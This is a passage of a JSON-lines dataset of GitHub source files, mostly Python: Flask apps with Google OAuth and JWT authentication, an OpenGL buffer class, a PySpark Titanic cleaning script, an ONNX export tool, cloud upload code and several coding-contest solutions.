data['entities'].keys():\n\t\tlocation = data['entities']['place'][0]['name']\n\telse:\n\t\tlocation = None\n\n\tif 'time' in data['entities'].keys():\n\t\tfor date in data['entities']['time']:\n\t\t\tsuccess = addEventToCalendar(data, title, date, location)\n\t\t\tmessage = 'Event has been added! Please check your Calendar {0}-{1}-{2}'.format(date.year, date.month, date.day)\n\t\t\tflash(message)\n\t\t\tif success is None:\n\t\t\t\tflash(\"Event fail to add (1)\", \"error\")\n\t\t\t\treturn redirect(url_for('index'))\n\telse:\n\t\tflash(\"Event fail to add (0)\", \"error\")\n\t\treturn redirect(url_for('index'))\n\t\n\treturn redirect(url)\n\n@app.route('/login')\ndef login():\n\tcallback = url_for('authorized', _external=True)\n\treturn google.authorize(callback=callback)\n\n@app.route('/logout')\ndef logout():\n\turl = request.args.get('next', url_for('index'))\n\tsession.pop('access_token', None)\n\tsession.pop('profile_name', None)\n\tsession.pop('profile_picture', None)\n\tsession.pop('email', None)\n\tflash('You were successfully logged out')\n\treturn redirect(url)\n\n@app.route(REDIRECT_URI)\n@google.authorized_handler\ndef authorized(resp):\n\taccess_token = resp['access_token']\n\tsession['access_token'] = access_token, ''\n\tprofile = getProfile()\n\tif profile is not None:\n\t\tsession['profile_name'] = profile['name']\n\t\tsession['profile_picture'] = profile['picture']\n\t\tsession['email'] = profile['email']\n\telse:\n\t\tsession.pop('profile_name', None)\n\t\tsession.pop('profile_picture', None)\n\t\tsession.pop('email', None)\n\tflash('You were successfully logged in')\n\tif 'url' in session:\n\t\treturn redirect(session['url'])\n\treturn redirect(url_for('index'))\n\n@google.tokengetter\ndef get_access_token():\n\treturn session.get('access_token')\n\n\n@app.context_processor\ndef context_processor():\n\tdef url_for_other_page(page):\n\t\targs = request.view_args.copy()\n\t\targs['page'] = page\n\t\treturn url_for(request.endpoint, **args)\n\n\treturn dict(url_for_other_page=url_for_other_page)\n\ndef main():\n\tapp.run()\n\nif __name__ == 
'__main__':\n\tmain()\n","repo_name":"dewzzjr/citivis-event","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7900550071","text":"from collections import Counter\ndef solution(id_list, report, k):\n answer = []\n chk = []\n\n dic = {}\n for i in id_list:\n dic[i] = []\n\n for case in report:\n report_id, report_name = case.split()\n if report_name not in dic[report_id]:\n dic[report_id].append(report_name)\n chk.append(report_name)\n\n counter = Counter(chk)\n\n for report_id in id_list:\n a = [i for i in dic[report_id] if counter[i] >= k]\n answer.append(len(a))\n\n return answer\n\n\n# id_list, report, k = [\"con\", \"ryan\"],[\"ryan con\", \"ryan con\", \"ryan con\", \"ryan con\"], 3\nid_list, report, k = [\"muzi\", \"frodo\", \"apeach\", \"neo\"], [\"muzi frodo\",\"apeach frodo\",\"frodo neo\",\"muzi neo\",\"apeach muzi\"],2\nprint(solution(id_list, report, k))\n#https://somjang.tistory.com/entry/Programmers-2022-KAKAO-BLIND-RECRUITMENT-%EC%8B%A0%EA%B3%A0-%EA%B2%B0%EA%B3%BC-%EB%B0%9B%EA%B8%B0-Python","repo_name":"GayeonKimm/CT","sub_path":"Programmers/1_level/신고 결과 받기.py","file_name":"신고 결과 받기.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23571007740","text":"import logging\nfrom functools import wraps\n\nfrom jose import ExpiredSignatureError, JWTError, jwt\nfrom jose.jwt import get_unverified_claims\n\nfrom challenge.application.helpers import create_jwt_key\nfrom challenge.application.models import Application\nfrom challenge.exceptions.api import Unauthorized\n\nlogger = logging.getLogger(__name__)\n\n\ndef auth_required(method):\n\n @wraps(method)\n def wrapper(self, *args, **kwargs):\n\n token = _get_header_token(self)\n payload = _get_token_claims(token)\n application = _get_application(payload)\n\n key = create_jwt_key(application)\n _validate_signature(application, token, key)\n\n return method(self, *args, **kwargs)\n\n return wrapper\n\n\ndef _get_header_token(view):\n authorization_header = view.request.headers.get('Authorization', '')\n if 'Bearer' not in authorization_header:\n raise Unauthorized(message='Invalid authorization header.')\n\n return authorization_header.replace('Bearer', '').strip()\n\n\ndef _get_token_claims(token):\n try:\n return get_unverified_claims(token)\n except JWTError:\n raise Unauthorized(message='Invalid token.')\n\n\ndef _get_application(payload):\n try:\n return Application.objects.get(id=payload['id'], is_active=True)\n except KeyError:\n logger.info('Invalid token.')\n raise Unauthorized(message='Invalid token.')\n except Application.DoesNotExist:\n logger.info(f'Application {payload[\"id\"]} not found.')\n raise Unauthorized()\n\n\ndef _validate_signature(application, token, key):\n try:\n jwt.decode(token, key)\n except ExpiredSignatureError:\n raise Unauthorized(message='Expired token.')\n except JWTError:\n logger.info(f'Failed to authenticate {application}.')\n raise Unauthorized()\n","repo_name":"Gamboua/challenge_labs","sub_path":"src/challenge/application/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10616000082","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, generators, print_function, 
with_statement\nimport ctypes\nfrom ctypes import c_int, c_uint, byref, POINTER\nimport numpy\nimport pyglet.gl\nfrom pyglet import gl\n\n\n__all__ = ['GLBuffer']\n\n\nc_intp = POINTER(c_int)\nc_uintp = POINTER(c_uint)\n\n\nclass _GLBufferContext(object):\n '''A context manager which binds an OpenGL buffer on entry\n and restores state on exit.'''\n\n\n def __init__(self, bufid):\n '''bufid - a valid OpenGL buffer object id'''\n\n self.bufid = bufid\n self.previd = c_uint(0)\n self.entrycount = 0\n\n\n def __enter__(self):\n if self.entrycount == 0:\n gl.glGetIntegerv(gl.GL_ARRAY_BUFFER_BINDING, ctypes.cast(byref(self.previd), c_intp))\n gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.bufid)\n self.entrycount += 1\n\n\n def __exit__(self, exc_type, exc_value, traceback):\n self.entrycount -= 1\n if self.entrycount == 0:\n gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.previd)\n\n\nclass GLBuffer(object):\n '''Abstracts an OpenGL buffer object with a defined datatype.\n Automatically resizes when adding data.'''\n\n def __init__(self, size=0, dtype=numpy.float32, usage=gl.GL_DYNAMIC_DRAW):\n '''\n size - how much storage to allocate for this buffer in advance (in items, not bytes)\n dtype - type of items in storage (float, float16, float32, int, etc.)\n usage - one of GL_{STREAM,STATIC,DYNAMIC}_{READ,COPY,DRAW}\n Description copied from OpenGL reference pages:\n\n The frequency of access may be one of these:\n STREAM\n The data store contents will be modified once and used at most a few times.\n STATIC\n The data store contents will be modified once and used many times.\n DYNAMIC\n The data store contents will be modified repeatedly and used many times.\n\n The nature of access may be one of these:\n\n DRAW\n The data store contents are modified by the application,\n and used as the source for GL drawing and image specification commands.\n READ\n The data store contents are modified by reading data from the GL,\n and used to return that data when queried by the application.\n COPY\n The data store contents are modified by reading data from the GL,\n and used as the source for GL drawing and image specification commands.'''\n\n self.usage = usage\n self.dtype = numpy.dtype(dtype)\n bufid = ctypes.c_uint(0)\n gl.glGenBuffers(1, ctypes.byref(bufid))\n self.bufid = bufid\n self.bound = _GLBufferContext(self.bufid)\n if size > 0:\n with self.bound:\n gl.glBufferData(gl.GL_ARRAY_BUFFER, size * self.dtype.itemsize,\n None, self.usage)\n\n\n def __len__(self):\n with self.bound:\n size = c_int(0)\n gl.glGetBufferParameteriv(gl.GL_ARRAY_BUFFER, gl.GL_BUFFER_SIZE, byref(size))\n return size.value // self.dtype.itemsize\n\n\n def __getitem__(self, key):\n with self.bound:\n if isinstance(key, slice):\n start = int(key.start)\n stop = int(key.stop)\n else:\n start = int(key)\n stop = start + 1\n sz = len(self)\n if start < 0 or start >= sz or stop < 0 or stop > sz or start >= stop:\n raise IndexError\n shape = (stop - start,)\n a = numpy.empty(shape=shape, dtype=self.dtype)\n gl.glGetBufferSubData(gl.GL_ARRAY_BUFFER, start * self.dtype.itemsize,\n (stop - start) * self.dtype.itemsize, a.ctypes.data)\n return a\n\n\n def __setitem__(self, key, value):\n with self.bound:\n sz = len(self)\n if isinstance(key, slice):\n start = int(key.start) if key.start is not None else 0\n stop = int(key.stop) if key.stop is not None else start + value.size\n else:\n start = int(key)\n stop = start + 1\n if start < 0 or stop < 0 or start >= stop:\n raise IndexError\n if stop > sz:\n newsz = max(sz * 2, stop)\n a = 
numpy.empty((newsz,), dtype=self.dtype)\n # intel dies when querying an empty buffer :[\n if sz > 0:\n gl.glGetBufferSubData(gl.GL_ARRAY_BUFFER, 0,\n sz * self.dtype.itemsize,\n a.ctypes.data)\n b = numpy.asarray(value).reshape(-1)\n a[start:stop] = b\n gl.glBufferData(gl.GL_ARRAY_BUFFER, newsz * self.dtype.itemsize,\n a.ctypes.data, self.usage)\n else:\n a = numpy.ascontiguousarray(value, self.dtype).reshape(-1)\n sz = min((stop - start), len(a))\n gl.glBufferSubData(gl.GL_ARRAY_BUFFER, start * self.dtype.itemsize,\n sz * self.dtype.itemsize, a.ctypes.data)\n","repo_name":"moshev/project-viking","sub_path":"src/util/glbuffer.py","file_name":"glbuffer.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"16330391292","text":"# -*- coding: utf-8 -*-\nimport io\n\nfrom setuptools import find_packages, setup\nfrom ATE import __version__\n\n# =============================================================================\n# Use Readme for long description\n# =============================================================================\nwith io.open('README.md', encoding='utf-8') as f:\n LONG_DESCRIPTION = f.read()\n\nsetup(\n name=\"Semi-ATE\",\n version=__version__,\n description=\"Framework for Semiconductor ATE testing projects\",\n long_description=LONG_DESCRIPTION,\n author=\"The Semi-ATE Project Contributors\",\n author_email=\"ate.organization@gmail.com\",\n license=\"GPL2\",\n keywords=\"Semiconductor ATE Automatic Test Equipment\",\n platforms=[\"Windows\", \"Linux\", \"Mac OS-X\"],\n packages=find_packages(),\n include_package_data=True,\n classifiers=[\n 'License :: OSI Approved :: GNU General Public License v2 (GPLv2)',\n 'Operating System :: MacOS',\n 'Operating System :: Microsoft :: Windows',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Education',\n 'Intended Audience :: Science/Research',\n 'Intended Audience :: Developers',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)',\n 'Topic :: Scientific/Engineering :: Human Machine Interfaces',\n 'Topic :: Scientific/Engineering :: Interface Engine/Protocol Translator',\n 'Topic :: Software Development :: Build Tools',\n 'Topic :: Software Development :: Code Generators',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Software Development :: Quality Assurance',\n ],\n entry_points={\n \"spyder.plugins\": [\n \"ate = ATE.spyder.plugin:ATE\",\n ]\n }\n)\n","repo_name":"HessTobias/Semi-ATE","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"29490323213","text":"from symsynd import demangle_swift_symbol, demangle_cpp_symbol\n\n\ndef test_swift_demangle():\n mangled = '_TFC12Swift_Tester14ViewController11doSomethingfS0_FT_T_'\n expected = (\n 'Swift_Tester.ViewController.doSomething '\n '(Swift_Tester.ViewController) -> () -> ()'\n )\n assert demangle_swift_symbol(mangled) == expected\n\n\ndef test_swift_demangle_options():\n mangled = (\n '_TTWVSC29UIApplicationLaunchOptionsKeys21_ObjectiveCBridgeable'\n '5UIKitZFS0_36_unconditionallyBridgeFromObjectiveCfGSqwx15_'\n 'ObjectiveCType_x'\n )\n default_expected = (\n u'protocol witness for 
static Swift._ObjectiveCBridgeable._'\n u'unconditionallyBridgeFromObjectiveC (Swift.Optional) -> A in conformance __C.'\n u'UIApplicationLaunchOptionsKey : Swift._ObjectiveCBridgeable '\n u'in UIKit'\n )\n simplified_expected = (\n u'protocol witness for static _ObjectiveCBridgeable._'\n u'unconditionallyBridgeFromObjectiveC(A._ObjectiveCType?) -> '\n u'A in conformance UIApplicationLaunchOptionsKey'\n )\n\n assert demangle_swift_symbol(mangled) == default_expected\n assert demangle_swift_symbol(mangled, simplified=True) == simplified_expected\n\n\ndef test_cpp_demangle():\n mangled = '_ZN6google8protobuf2io25CopyingInputStreamAdaptor4SkipEi'\n expected = 'google::protobuf::io::CopyingInputStreamAdaptor::Skip(int)'\n assert demangle_cpp_symbol(mangled) == expected\n\n\ndef test_demangle_failure_underscore():\n mangled = '_some_name'\n assert demangle_swift_symbol(mangled) is None\n\n\ndef test_demangle_failure_no_underscore():\n mangled = 'some_other_name'\n assert demangle_swift_symbol(mangled) is None\n","repo_name":"getsentry/symsynd","sub_path":"tests/test_demangle.py","file_name":"test_demangle.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"48"} +{"seq_id":"37492524453","text":"from flask import Flask\nfrom flask_restful import Resource, Api\nimport positionProvider\n\n\nclass api_root(Resource):\n def get(self):\n print('holdingProvider!')\n return {'src': 'version 0.0.1'}\n\n\nclass api_holding(Resource):\n def get(self):\n try:\n p = positionProvider.Position()\n h = p.getHolding()\n result = p.getHoldingJosn()\n except (Exception) as err:\n print(err)\n\n return result\n\ndef main():\n app = Flask(__name__)\n api = Api(app)\n api.add_resource(api_root, '/')\n api.add_resource(api_holding, '/holdings')\n app.run(host=\"0.0.0.0\", port=int(\"80\"), debug=True)\n\nif __name__ == '__main__':\n\n print ('test')\n main()\n","repo_name":"joeycmlam/pyHoldingProvider","sub_path":"src/wbServices.py","file_name":"wbServices.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2849063485","text":"\"\"\"Import all necessary packages\"\"\"\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import (\n split as _split,\n mean as _mean,\n sum as _sum,\n col as _col,\n when,\n isnan,\n count,\n)\nfrom pyspark.ml.feature import Imputer\n\nspark = SparkSession\\\n .builder\\\n .appName('Exercise1')\\\n .getOrCreate()\n\n# Load data as data frame and keep column names + data types\n# from original data set with head = True and inferSchema = True\n# Add escape option to ignore \" in the csv text\ndf_pyspark = spark.read\\\n .option(\"escape\",\"\\\"\")\\\n .csv('titanic.csv', header = True, inferSchema = True)\n\n\"\"\"\n# First look at the data, columns and data types\n\nprint((df_pyspark.count(), len(df_pyspark.columns)))\ndf_pyspark.show()\nprint(df_pyspark.printSchema())\nprint(df_pyspark.columns)\nprint(df_pyspark.dtypes)\ndf_pyspark.describe().show()\n\n# Find out how many missing values each column has\ndf_pyspark.select([count(when(isnan(c) | _col(c).isNull(), c))\\\n .alias(c) for c in df_pyspark.columns]).show()\n\nprint((df_pyspark.count(), len(df_pyspark.columns))) # Check shape before shaping\n\"\"\"\n\n# Drop not needed columns and replace/rename missing values\ndf_pyspark = df_pyspark.drop('Ticket') # Not necessary for my intentions\ndf_pyspark = df_pyspark.na.drop(how = 'any', 
thresh = 10) # Drop rows with at least two NA values\ndf_pyspark = df_pyspark.na.drop(how = 'any', subset = ['Cabin']) # Drop rows with missing values\n # in cabin column\n# Replace missing age values by median\nimputer = Imputer(\n inputCols = ['Age'],\n outputCols = ['{}_imputed'.format(c) for c in ['Age']]\n ).setStrategy('median')\ndf_pyspark = imputer.fit(df_pyspark).transform(df_pyspark)\ndf_pyspark = df_pyspark.drop('Age') # Drop old Age column\n\ndf_pyspark = df_pyspark.na.fill('unknown') # Replace NA values in Embarked with description 'unknown'\n\n# Generate and add new interesting columns\nfamily_column = when((_col('SibSp') > 0) | (_col('Parch') > 0), True).otherwise(False)\ndf_pyspark = df_pyspark.withColumn('Family', family_column)\\\n .withColumn('FamilySize', df_pyspark['SibSp'] + df_pyspark['Parch'])\n\n# Rename columns for better understanding\ndf_pyspark = df_pyspark.withColumnRenamed('Family', 'isFamily') # Because only boolean\ndf_pyspark = df_pyspark.withColumnRenamed('SibSp', 'NumberOfSibOrSp')\\\n .withColumnRenamed('Parch', 'NumberOfParOrChild')\\\n .withColumnRenamed('Pclass', 'Class')\ndf_pyspark = df_pyspark.withColumnRenamed('Age_imputed', 'Age') # Change name back to Age\n\n# Keep only rows with a fare greater than zero\ndf_pyspark = df_pyspark.filter('Fare > 0')\n\n# Split Name column into title, firstname and lastname\ndf_pyspark = df_pyspark.withColumn('Lastname', _split(_col('Name'), ', ').getItem(0))\\\n .withColumn('TitleFirstname', _split(_col('Name'), ', ').getItem(1))\ndf_pyspark = df_pyspark.withColumn('Title', _split(_col('TitleFirstname'), '. ').getItem(0))\\\n .withColumn('Firstname', _split(_col('TitleFirstname'), '\\ ').getItem(1))\n\n# Rearrange, select columns and sort by age\ndf_pyspark = df_pyspark.select('PassengerId', 'Title', 'Firstname', 'Lastname', 'Sex', 'Age', \\\n 'Survived', 'Class', 'Embarked', 'Fare', 'Cabin', 'isFamily', \\\n 'FamilySize', 'NumberOfSibOrSp', 'NumberOfParOrChild').sort('Age')\n\n# Find interesting values\nfamily_fares = df_pyspark.groupBy('Lastname').agg(_sum('Fare'))\ndeath_rate_by_families = df_pyspark.groupBy('Lastname').agg(_mean('Survived'))\ndeath_rate_by_gender = df_pyspark.groupBy('Sex').agg(_mean('Survived'))\ndeath_rate_by_title = df_pyspark.groupBy('Title').agg(_mean('Survived'))\ndeath_rate_by_class = df_pyspark.groupBy('Class').agg(_mean('Survived'))\ndeath_rate_by_cabin = df_pyspark.groupBy('Cabin').agg(_mean('Survived'))\nmean_survivor_age = df_pyspark.groupBy('Survived').agg(_mean('Age'))\n\n#family_fares.show()\n#death_rate_by_families.show()\n#death_rate_by_gender.show()\n#death_rate_by_title.show()\n#death_rate_by_class.show()\n#death_rate_by_cabin.show()\n#mean_survivor_age.show()\n#df_pyspark.show()\n\n#print((df_pyspark.count(), len(df_pyspark.columns))) # Check shape after shaping\n\n# Save new data frame as csv\n\n# Save each partition individually -> slicing bigger csv file for better scaling\ndf_pyspark.write.csv('titanic_family_refined.csv')\n# Bundle partitions\ndf_pyspark.repartition(1).write.format(\"com.databricks.spark.csv\")\\\n .option(\"header\", \"true\").save(\"titanic_family_refined2.csv\")\n\"\"\"\n# Alternatives\ndf_pyspark.coalesce(1).write.format(\"com.databricks.spark.csv\")\\\n .option(\"header\", \"true\").save(\"titanic_family_refined3.csv\")\ndf_pyspark.toPandas().to_csv('titanic_family_refined4.csv') # Save as single csv file\n\"\"\"\n\n# Stopping Spark Session and freeing potential cluster 
resources\nspark.stop()\n","repo_name":"SamiHaddouti/Pyspark-Data-Shaping","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35076673189","text":"from ipynta.predicates import BasePred\r\nfrom os import path\r\nimport pytest\r\n\r\nSAMPLES_DIR = path.dirname(path.dirname(path.abspath(__file__))) + \"/imgs\"\r\n\r\n\r\ndef test_base_pred_constructor():\r\n try:\r\n BasePred()\r\n except Exception:\r\n pytest.fail(\"BasePred constructor failed\")\r\n\r\ndef test_base_pred_execute_empty():\r\n pred = BasePred()\r\n input = []\r\n output = pred.execute(input)\r\n\r\n assert(len(output) == 0)","repo_name":"allanchua101/ipynta","sub_path":"src/tests/predicates/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"70676438865","text":"import click\n\nimport pandas as pd\n\n\n@click.command()\n@click.argument(\n \"input_tsvs\",\n nargs=-1,\n type=click.Path(exists=True, readable=True),\n required=True,\n)\n@click.argument(\"merged_tsv\", nargs=1, type=click.Path(), required=True)\ndef merge(input_tsvs, merged_tsv) -> None:\n \"\"\"Merge multiple tsvs into a single tsvs\"\"\"\n index_columns = [\"#CHROM\", \"POS\", \"ID\", \"REF\", \"ALT\"]\n dfs = [\n pd.read_csv(input_tsv, sep=\"\\t\", index_col=index_columns)\n for input_tsv in input_tsvs\n ]\n df_merged = pd.concat(dfs, axis=1)\n df_merged.to_csv(merged_tsv, sep=\"\\t\")\n\n\nif __name__ == \"__main__\":\n merge()\n","repo_name":"kipoi/kipoi-veff2","sub_path":"kipoi_veff2/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"31495225947","text":"# import required libraries\nimport io\nimport pandas as pd\nfrom google.cloud import storage\nfrom prefect import flow, task\n\n# Set up the Google Cloud Storage client\nclient = storage.Client.from_service_account_json('./app/creds.json')\nbucket_name = 'beer_reviews_bucket'\nbucket = client.bucket(bucket_name)\n\n\n\n@task\ndef configure_bucket_exists(bucket):\n \n # Check if the bucket already exists\n if not bucket.exists():\n # Create the bucket\n client.create_bucket(bucket_name)\n bucket = client.bucket(bucket_name)\n print(f\"Bucket {bucket_name} created.\")\n\n\n@task\ndef upload_processed_data(df):\n # create a BytesIO object\n buffer = io.BytesIO()\n \n # save processed data to parquet file\n df.to_parquet(buffer)\n \n # upload data to Google Cloud Storage\n blob = bucket.blob(\"processed_beer_reviews.parquet\")\n blob.upload_from_string(buffer.getvalue())\n \n return \"Data upload complete.\"\n\n@flow()\ndef upload_flow(data):\n configure_bucket_exists(bucket)\n processed_data = upload_processed_data(data) \n return processed_data\n","repo_name":"directdetour/BeerReviewsDataPipeline","sub_path":"flows/upload_flow.py","file_name":"upload_flow.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14328132913","text":"import torch\nimport warnings\nimport onnxruntime\nimport numpy as np\nimport os\nimport torchaudio\nimport argparse\n\nfrom src.speechbraindev.pretrained import SpectralMaskEnhancement\nfrom src.cmgan_onnx import CMGAN_ONNX\n\nwarnings.filterwarnings(\"ignore\")\n\ndef 
verify(onnx_model_path,\n           torch_model,\n           dummy_input):\n    assert onnx_model_path is not None\n    assert torch_model is not None\n    assert dummy_input is not None\n    print(\"Verifying the exported model...\")\n    torch_out = torch_model(dummy_input)\n    try:\n        ort_session = onnxruntime.InferenceSession(onnx_model_path)\n        ort_inputs = {ort_session.get_inputs()[0].name: to_numpy(dummy_input)}\n        ort_outs = ort_session.run(None, ort_inputs)\n\n        np.testing.assert_allclose(to_numpy(torch_out), ort_outs[0], rtol=1e-03, atol=1e-05)\n        print(\"Exported model has been tested with ONNXRuntime, and the result looks good!\")\n    except:\n        print(\"Something went wrong :'(\")\n\ndef to_numpy(tensor):\n    output = tensor.detach().cpu().numpy() if tensor.requires_grad else tensor.cpu().numpy()\n    return output\n\ndef metricganp_to_onnx():\n    print(\"Creating MetricGAN+ model...\")\n    enhance_model = SpectralMaskEnhancement.from_hparams(\n        source=\"speechbrain/metricgan-plus-voicebank\",\n        savedir=\"pretrained_models/metricgan-plus-voicebank\",\n    )\n    print(\"Loading dummy input...\")\n    dummy_input = enhance_model.load_audio(\"data/dummy_input.wav\")\n    dummy_input = dummy_input.unsqueeze(0)\n    os.remove(\"dummy_input.wav\")\n    print('Exporting to ONNX Model...')\n    torch.onnx.export(enhance_model, \n                      dummy_input, \n                      \"metricganp.onnx\",\n                      export_params=True,\n                      opset_version=15,\n                      input_names = ['input'],\n                      output_names = ['output'],\n                      dynamic_axes={'input' : {0 : 'batch_size'},\n                                    'output' : {0 : 'batch_size'}})\n    print(\"Model has been exported to ONNX!\")\n    verify(\"metricganp.onnx\", enhance_model, dummy_input)\n\ndef cmgan_to_onnx():\n    checkpoint_path = \"./pretrained_models/CMGAN/cmgan_ckpt\"\n    dummy_input_path = \"./data/noisy_sample_16k.wav\"\n    print(\"Creating Conformer-based GAN model...\")\n    cmgan_onnx_model = CMGAN_ONNX(checkpoint_path=checkpoint_path,\n                                  device_id=None)\n    print(\"Loading dummy input...\")\n    dummy_input, sr = torchaudio.load(dummy_input_path)\n    assert sr == 16000\n    # torch_out = cmgan_onnx_model(dummy_input)\n\n    # exit()\n    print('Exporting to ONNX Model...')\n    torch.onnx.export(cmgan_onnx_model, \n                      dummy_input, \n                      \"cmgan.onnx\",\n                      export_params=True,\n                      opset_version=11,\n                      input_names = ['input'],\n                      output_names = ['output'],\n                      dynamic_axes={'input' : {0 : 'batch_size'},\n                                    'output' : {0 : 'batch_size'}})\n    print(\"Model has been exported to ONNX!\")\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--model\", type=str, help=\"cmgan or metricganp\", default=\"cmgan\")\n    args = parser.parse_args()\n    print(\"+------------------------------+\")\n    print(\"| TonSpeech |\")\n    print(\"| Export to ONNX Model |\")\n    print(\"+------------------------------+\")\n    \n    if args.model == \"cmgan\":\n        cmgan_to_onnx()\n    elif args.model == \"metricganp\":\n        metricganp_to_onnx()\n    else:\n        print(\"Unsupported model was found!\")","repo_name":"tungedng2710/TonSpeech","sub_path":"onnx.py","file_name":"onnx.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"3138682401","text":"class Solution:\n    def findMaximizedCapital(self, k: int, w: int, profits: List[int], capital: List[int]) -> int:\n        cp = sorted(zip(capital, profits), reverse= True)\n        hp = []\n        while k:\n            while cp and cp[-1][0] <= w:\n                c, p = cp.pop()\n                heapq.heappush(hp, -p)\n            if not hp:\n                break\n            w -= heapq.heappop(hp)\n            k -= 1\n        return 
w\n","repo_name":"fish-ball/leetcode","sub_path":"algorithms/leet.0502.src.1.py","file_name":"leet.0502.src.1.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9957711357","text":"H,W,C,Q = [int(x) for x in input().split()]\n\nh_dict = {}\nv_dict = {}\n\ncolor_count = {\n x: 0 for x in range(1, C+1)\n}\n\ntnc = []\n\nfor _ in range(Q):\n tnc.append([int(x) for x in input().split()])\n\n\nfor t,n,c in tnc[::-1]:\n if t == 1:\n if n not in h_dict:\n h_dict[n] = c\n color_count[c] += W - len(v_dict)\n\n if t == 2:\n if n not in v_dict:\n v_dict[n] = c\n color_count[c] += H - len(h_dict)\n\nprint(' '.join([str(color_count[i]) for i in range(1,C+1)]))","repo_name":"barnrang/Pro-con","sub_path":"Atcoder/Regular-130/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73896838227","text":"import sys\nfrom numpypy import *\n\n\ndef kadane(array, width):\n # kadane's dynamic programming algorithm\n maxL, maxR, maxSum = -1, -1, 0\n currL, currR, currSum = 0, 0, 0\n for i, a in enumerate(array):\n if a != width or currSum + a < a:\n currL, currR, currSum = i + 1, i + 1, 0\n else:\n currR, currSum = i + 1, currSum + a\n if maxSum < currSum:\n maxL, maxR, maxSum = currL, currR, currSum\n return maxL, maxR, maxSum\n\n\ndef solve(par):\n S, B, blocks = par\n mat = ones((S + 1, S + 1), dtype=byte)\n for i in range(S + 1):\n mat[i, 0] = mat[0, i] = 0\n for bloc in blocks:\n i1, j1, i2, j2 = bloc\n for i in range(i1, i2 + 1):\n for j in range(j1, j2 + 1):\n mat[i, j] = 0\n\n memo = zeros((S + 1, S + 1), dtype=byte) # store the sum of upperleft\n for j in range(1, S + 1):\n if mat[1, j] == 1:\n memo[1, j] = 1\n for i in range(1, S + 1):\n if mat[i, j] == 1:\n memo[i, j] = 1 + memo[i - 1, j]\n else:\n memo[i, j] = memo[i - 1, j]\n\n currMax = -1\n for i in range(0, S):\n for j in range(i, S + 1):\n array = []\n for k in range(1, S + 1):\n array.append(memo[j, k] - memo[i, k])\n maxL, maxR, maxSum = kadane(array, j - i)\n if maxSum > currMax:\n currMax = maxSum\n # print(i, maxL, j, maxR, maxSum)\n return currMax\n\n\nif __name__ == '__main__':\n sys.stdin = open('input.txt', 'r')\n numTests = int(input())\n for itertest in range(numTests):\n S = int(input())\n B = int(input())\n blocks = []\n for i in range(B):\n blocks.append(map(int, raw_input().split()))\n\n print(solve((S, B, blocks)))\n","repo_name":"yubinbai/pcuva-problems","sub_path":"UVa 10667 - Largest Block/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"48"} +{"seq_id":"23208522166","text":"load(\n \"@io_bazel_rules_scala//scala/private:rule_impls.bzl\",\n _scala_binary_impl = \"scala_binary_impl\",\n _scala_junit_test_impl = \"scala_junit_test_impl\",\n _scala_library_for_plugin_bootstrapping_impl = \"scala_library_for_plugin_bootstrapping_impl\",\n _scala_library_impl = \"scala_library_impl\",\n _scala_macro_library_impl = \"scala_macro_library_impl\",\n _scala_repl_impl = \"scala_repl_impl\",\n _scala_test_impl = \"scala_test_impl\",\n)\nload(\n \"@io_bazel_rules_scala//scala/private:coverage_replacements_provider.bzl\",\n _coverage_replacements_provider = \"coverage_replacements_provider\",\n)\nload(\"@bazel_tools//tools/build_defs/repo:http.bzl\", \"http_archive\", \"http_file\")\nload(\n 
